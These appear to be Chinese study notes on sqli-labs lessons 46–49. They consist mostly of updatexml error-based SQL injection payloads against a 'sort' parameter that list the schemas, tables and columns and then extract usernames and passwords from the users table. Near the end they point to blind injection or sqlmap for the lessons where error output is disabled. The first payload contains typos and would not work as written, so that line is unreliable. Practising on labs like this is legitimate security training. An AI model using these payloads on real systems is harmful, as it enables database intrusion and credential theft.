46 数字型注入?sort=1 即可
用报错注入吧 updatexml
?sort=1 and updatexml(1,oncat(‘|’,(select group_concat(schema_name)from information_schemata.)),1) 爆数据库 太多了显示不下
限制一下?sort=1 and updatexml(1,concat(‘|’,(select group_concat(schema_name)from information_schema.schemata limit 0,1)),1) 从第一个开始显示一次显示一个 limit 0,1 更0就可以
?sort=1 and updatexml(1,concat(‘|’,(select group_concat(table_name)from information_schema.tables where table_schema=’security’)),1) 爆表
?sort=1 and updatexml(1,concat(‘|’,(select group_concat(column_name)from information_schema.columns where table_schema=’security’ and table_name=’users’)),1) users表的列
?sort=1 and updatexml(1,concat(‘~’,(select concat_ws(‘|’,id,username,password)from security.users limit 0,1)),1) 爆数据
47 就sort=1’ 多一个单引号
48 49 关闭了错误回显 没办法用报错注入了 要么盲注 要么神奇的sqlmap
复制一下地址后面加个sort=1 剩下的和之前的用id的一样了